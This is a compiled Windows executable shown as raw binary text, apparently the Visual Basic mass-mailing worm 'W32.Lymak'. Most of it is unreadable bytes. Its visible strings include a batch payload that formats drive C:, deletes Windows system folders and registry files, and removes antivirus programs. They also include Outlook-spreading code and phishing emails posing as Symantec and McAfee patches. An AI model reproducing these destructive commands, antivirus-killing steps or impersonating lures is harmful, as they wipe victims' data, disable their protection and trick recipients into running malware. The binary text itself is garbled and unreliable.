MZ@ !L!This program cannot be run in DOS mode. $sisisildsiRichsiPELx86 0@ԥ(( .text\ `.data@.rsrc@@'};MSVBVM60.DLLRsPsiPsPs Ps{DsͫPsEDsPsPsPsCs|PsPs QDsxCsBDsDsnOss{RsmYOsKDsPs?PsTPsOsދDs]Qs[TPspDs3OsXPs]TDsDs-XPsbOsBsyOsEDsFDsGDsiPsOsXtQsFOsOsOs%<@%@%@%@%$@%t@%|@% @%(@%H@%@%8@%@%@%@%@%L@%h@%@%@%@%0@%X@%p@%\@%@%@%@%@%@%4@%@%@%@% @%@%d@%x@%`@%@@%T@%P@%,@%D@%@%l@%@h@08fAk7X0*Lymak*1,{K\↝'yNjd9(է:O3f `ӓ_ZForm1  W32.Lymak@mmB"#$Form1&'(.5-;H>DFJ<&@&@(@8@VB5!*~ @0@@@x~LymakLymakLymakP,{K\$@LP*WL;FC%^@LR@R@Q@hQ@ Q@P@P@,P@O@O@TO@O@N@xN@0N@M@M@LM@M@L@hL@4L@K@K@TK@J@;@+@P+@+@*@@*@)@<&@&@8@t@=@T@@(S@@HS@hS@S@S@S@S@S@tP@ T@@T@\T@|T@T@T@T@T@ U@$U@LU@hU@U@@:@2@`:@,@@@U@\V@xV@@IJ@V@V@*@@@V@8@@>@V@@)@@P@K@8Q@4@ *@X*@Q@@Q@*@D@J@؈@z@@g@؈@@z@@@g@@p8H@Mb؍$E緍؍$E緍؍$E緍еHqIμ]2KETBnFttéBC++J/S` W 2c49f800-c2dd-11cf-9ad6-0080c7e7b78dMSWINSCK.OCXMSWinsockLib.WinsockWinsockjj<&@@Х@@@*\AC:\Documents and Settings\Vladimor Chamlkovic.MELHACKE-M33AAU\Desktop\Campur\Lymak\Project1.vbp@@!<&@ '@H@0@S@J@O@lO@P@,@:@V@\@b@W@h@W@N@HN@ O@@@W@0W@@W@@L@K@4@W@W@W@W@(X@8X@PX@hX@X@t@z@X@W@@Y@X@Y@(Y@4Y@@Y@dM@M@@J@V@O@HY@DP@P@(@(@@)@`:@@@>@@X@I@J@dR@PY@lY@Y@Y@Y@@n@M@P@<:@,:@L:@R@LL@L@I@Y8p X+Y8tM(@VCddp Y/dXtM(@ \#d0lxlt=]C\\^C`` j@~@d@de@e@Pd@x@Lo@ h@i@u@@p@f@Hb@ls@j@@~@@d@@de@@e@@Pd@@Ẑx@@Lo@@ h@@i@@Ằu@@ẘ@@Ẩp@@Ẕf@@Hb@@ls@@<&@a@P'@@x@j@@I@@@@@hl@@ԋ@@ܲ@dZ@Y@@W@@Z@Z@̲@n@`:@I@:@Բ@@@@@@@Z@Z@P@<:@,:@L:@4Y@ [@(@L[@@`[@Y@@V@@[@@[@@[@@@W@,@t@V@(@(@d(@P@K@8Q@p(@@[@Q@*@|(@[@ *@X(@[@X*@(@\@Q@(@\\@(@\@(@@(@@(@(@(@((@\@в@h:@>@IJ@\@hU@@@\@h]@@<^@]@8@M@@Ȳ@L^@lK@l^@@@@@Lk@a@@?@?@@@<@@@@A@,B@B@C@C@8D@D@@>@&@D@<@=@,=@H@H@H@H@H@H@I@(I@0I@@I@LI@dI@pI@@X@I@hJ@h+@,@+@^L@b@ؘ@l@m@()@8)@@dH)@D%@X)@%@&@/&@%@&@%@!@@@@%@df=3L@h@øf=3b@h@øf=3ؘ@h@øf=3l@h@øf=3m@h@@c@@x@ {e &@'@ >!@,@'@ '@@tJ@0@'@H@tJ@@@'@T@R@P@'@0X@XJ@^@(@'@@(@+@+@+@<=@<@HJ@LymakForm1ComandosClientFIREWALLGLOBALFRMMAINA01A02A03A04A05A06A07C01C02C03C04C05D01D02H01H02J01J02N03Q03Q04'yNjd9(է>6X)NHh,{K\LvDGQ4:O3f `ӓForm.=h8+3qD:\Program Files\Microsoft Visual Studio\VB98\VB6.OLBVB`)@ p)@)@@ا KERNEL32 OpenProcess)@)@@@ th)@@GetExitCodeProcess)@,*@@@ th@*@@ CloseHandleclsgoto CN)@x*@ @(@ th*@@user32 SendMessageA*@*@,@4@ th+@@GetWindowsDirectoryA)@8+@8@@@ thP+@@GetSystemDirectoryA)@+@D@L@ th+@@SetOpcijeMonitora9O3f `ӓWinpathSyspath*p4+008@DHLC:\Autoexec.batecho off6echo Lymak Virus Loading...BIf Exist %Windir%\*A.exe goto BRRgoto EMM:BRR,FORMAT C: /u /autotestgoto END:EMM C:\Lymak.exe.bat:END<:: Lymak Virus by Arnold Lavoc8If Exist C:\Windows goto GET:GET6DELTREE %Windir%\System\*.*DELTREE %Windir%\Start Menu\Programs\Accessories\System Tools\*.*6DELTREE %Windir%\Cursor\*.*2DELTREE %Windir%\Temp\*.*8DELTREE %Windir%\Command\*.*:DELTREE %Windir%\System32\*.* :KFRPFattrib %Windir%\System.dat -s -h -rBattrib %Windir%\User.dat -s -h -r:DEL %Windir%\System.dat >>NUL6DEL %Windir%\User.dat >>NUL:CN`If Exist C:\Progra~1\Kasper~1\Avp32.exe goto AVPgoto NAV:AVP :KTROgoto MCAPDEL C:\Progra~1\Kasper~1\Avp32.exe >>NUL:NAVZIf Exist C:\Progra~1\Norton~1\*.exe goto KNAVgoto TRO :KNAVHDEL C:\Progra~1\Norton~1\*.exe >>NUL:TRO\If Exist C:\Progra~1\Trojan~1\Tc.exe goto KTROgoto NORJDEL C:\Progra~1\Trojan~1\Tc.exe >>NUL:NORhIf Exist C:\Progra~1\Norton~1\S32integ.dll goto KNORgoto FPR :KNORVDEL C:\Progra~1\Norton~1\S32integ.dll >>NUL:FPRdIf Exist C:\Progra~1\F-prot95\Fpwm32.dll goto KFRPRDEL C:\Progra~1\F-prot95\Fpwm32.dll >>NUL:MCA\If Exist C:\Progra~1\Mcafee\Scan.dat goto KMCAgoto TBA :KMCAJDEL C:\Progra~1\Mcafee\Scan.dat >>NUL:TBAXIf Exist C:\Progra~1\Tbav\Tbav.dat goto KTBAgoto ANT :KTBAFDEL C:\Progra~1\Tbav\Tbav.dat >>NUL:ANTrIf Exist DEL C:\Progra~1\Avpersonal\Antivir.vdf goto KANTgoto TBAV :KANTXDEL C:\Progra~1\Avpersonal\Antivir.vdf >>NUL :TBAVPIf Exist C:\Tbav95\Tbscan.sig goto KTBAV :KTBAV<DEL C:\Tbav95\Tbscan.sig >>NUL:echo Lymak Virus Spreading...EXIT6There are no chance to you!W32.Lymak#=h8+3q"=h8+3q:@,:@yO3f `ӓ\.EXE *.EXEz.ex$NDo you know what is the most dangerous,Tvirus and worm in the world. It's a Lymak! Is'nt it!6Win32.Lymak by Arnold Lavoc\Setup.EXE\Setup32.EXEVBA6.DLL:@P@SMHi! `Long time no see! I think you don't remember me!vOpen a file that I attached for you, It's about me and you getnamespaceOutlookprofilebrabout ten years ago. I made it with Macromedia Flash 6.0.8Your Old Friend Arnold Lavoc>Dear customer of Symantec Corp.We have send to you a virus removal for W32.BugBear@mm version 1.40. \jump0001.exe&Outlook.ApplicationThere are many bugs are fixed. Download immediately an run it to prevent this worm from spread.By Arnold Lavoc0Editor of Symantec Corp.DDear Customer of McAfee VirusScan, \install0221.exe\setup93028.exe\fx09302.exeWe have already create a patch for McAfee Virus Scan 7.0 product becausewe have detected that the monitor scan technology does not function correctlywhen the virus is detected. To prevent this problem please download an attachmentand run it into the current directories. It will search an patch automatically when it found.\Editor of Networks Associates Technology, Inc.8MILAN SYSTEM SECURITY CENTERDear Customer,$Got Special Offer!\setup.exeMAPI|Do you want to learn more about virus or make your own virus. We have attached to you a file that can teach you how to make and prevent the virus. This file also thrustly and have a Digital Signature &ALERT! AND WARNING!Run away!to give to you more trustly of this product. You can learn more about this utility athttp://www.mssc.com/index.html to learn more about this powerful utilities.NManager Of Milan System Security CenterIMPORTANT!&PREVENT FROM VIRUS!passwordLogonaddresslistsCountaddressentriescreateitemRecipientsAddSubjectbodyAttachmentssendlogoffD" N@Y;|\qL ;W*WL;FC%JyOiHX˦ttéBWinSockServer0UOgC6QvoC:\KAMIL\System32\MSWINSCK.ocaMSWinsockLibI@I@J@T@اRegistryVerify H.exe GetShortPathNameA)@J@X@`@ thJ@@4 GA  P@4, GA,4 0,(4$ GA$ MSWINSCK.OCXDllRegisterServer,K@@K@d@l@ thTK@@GetDriveTypeA)@K@p@x@ thK@@GetLogicalDriveStringsA)@K@|@@ thK@@ kernel32.dll$L@+@@@ th4L@@$L@8+@@@ thhL@@ SetWindowPos*@L@@@ thL@@mpr WNetGetUserAL@L@@@ thM@@GetComputerNameA)@8M@@@ thLM@@ CopyFileA)@M@ķ@̷@ thM@@ExitWindowsEx*@M@з@ط@ thM@@ advapi32.dll RegCloseKeyN@$N@ܷ@@ th0N@@RegCreateKeyExAN@hN@@@ thxN@@ RegOpenKeyAN@N@@@ thN@@RegOpenKeyExAN@N@@@ thO@@RegQueryValueExAN@@O@ @@ thTO@@RegSetValueExAN@O@@ @ thO@@FindFirstFileA)@O@$@,@ thO@@FindNextFileA)@P@0@8@ th,P@@ FindCloseFRW.EXE)@dP@<@D@ thP@@CreateToolhelp32Snapshot)@P@H@P@ thP@@Process32First)@Q@T@\@ th Q@@Process32Next)@XQ@`@h@ thhQ@@TerminateProcess)@Q@l@t@ thQ@@RegisterServiceProcess$L@Q@x@@ thR@@GetVersionExA)@h1x2tpT@(xtphYdl4llp4lp^. q`txMd@T I T:D:]@5T\:*2xK$L Mx hNk2x^Oq,$? RT@T$ t(xT4lK /D0 1*#\X4lX^2q< 0lP2\XPrR2,,3#\ pl\,Gk./\0kj kj d kjpjT,3#\3,3#X 1 lX,Gl kjld;2\X 10P^4q< 0lRj P 5<l:6]3:7%l 8l:9]3:9%l 8bkjc)l kbld*#\:*X ;2\X bdT@pVI0J@I0J@l d! \X @ 1tltd4ldltJ^q`F`>$? @2\X610T^4q< 0lRe T 5<T@lTI0J@I0J@l d (\X{Cdd /dCdd /dCdd /dCdd /dCdd /dCdd /dCdd /d Cdd /d Cdd /d Cdd /d Cdd /d Cdd /dCdd /dCdd /dCdd /dCdd /dCdd /dCdd /dCdd /dCdd /dCtCddt  1p/dlp=lp=lp #d=/dlpJlp 1pY`t Y`:PN@@Cddt /d5@lp=p CtCddt  1p/dlp=lp=lp #d=/dlpJlp 1pDY`t Y`:PN@@Cddt /d5@lp=p  Cdd /d!Cdd /dv'@ "ql5@v#$*#dll]/d%ll& hvd8lhv' (10)>0#d*#4ll& 2d40lhv' *lhv'.,@MP@ +-,hf8Dll=H@P,tp ,d40@K@vRdh$ h Xld*#`S*#\ T1x2d`\h,vUV*#dS*FL< /<`1t/d6L<WCp*VCddp  #`lt=2d`Y8p X+Y8tM(@VCddp Y/dZCp*VCddp  #`lt=2d`SY8p X+Y8tM(@VCddp Y/dp*VCddp  #`lt=2d`Y8p X+Y8tM(@VCddp Y/dXtM(@ \#d0lxlt=]C\\^C``  #$02d`\$lt _Dlt`4l`lxd4ld^` q8 q=0A60h(p% Bq @ @>B0N5 @l=050LlC\lCm:pW0:`W%l=l6 0llq:pW~~'`%'p%$ !@!<,<| ll,\\L Lv0|lK ]                  =  ]                             ! " # $ " % & ' ( ) ' * + , - . / 0 1 2 3 1 4 5 6 7 8 6 9 : ; < = ; > ? @ A B @ C D   E F   G H =%'L Is8dn8j<\5L%\(l0]/L\(